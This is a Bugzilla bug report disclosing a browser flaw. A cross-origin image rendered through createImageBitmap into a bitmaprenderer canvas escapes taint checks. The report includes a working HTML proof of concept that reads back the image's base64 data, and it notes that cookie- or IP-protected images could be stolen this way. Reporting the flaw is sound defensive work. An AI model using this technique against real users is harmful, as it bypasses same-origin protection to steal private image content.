Bugzilla

User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.96 Safari/537.36

Steps to reproduce:

If the crossorigin attribute is not specified for an image, the image may be
rendered in a bitmap canvas; the data can be accessced by JavaScript.
A proof of concept is shown below.
```
<html><body>
  <script charset="utf-8">
    function getData() {
      createImageBitmap(this, 0, 0, this.naturalWidth,
        this.naturalHeight).then(function(bmap) {
        var can = document.createElement('canvas');
        var ctx = can.getContext('bitmaprenderer');
        ctx.transferFromImageBitmap(bmap);
        document.getElementById('result').textContent = can.toDataURL();
      }); }
  </script>
  <img src="https://duckduckgo.com/assets/logo_homepage_mobile.normal.v107.png" onload="getData.call(this)"/>
  <br/><textarea readonly style="width:100%;height:10em" id="result"></textarea>
</body></html>
```

Actual results:

The image, which should not be accessible to JavaScript from origins other than
https://duckduckgo.com is in fact rendered in the tainted canvas and its
base64-encoded contents are displayed.

Images on external domains protected by cookies or IP whitelisting can
therefore be stolen using Cross-site Request Forgery even if the target server
does not give CORS access to other domains.


Expected results:

An error should have been thrown similar to the error shown when rendering tainted canvases in a 2D context:
  "The operation is insecure."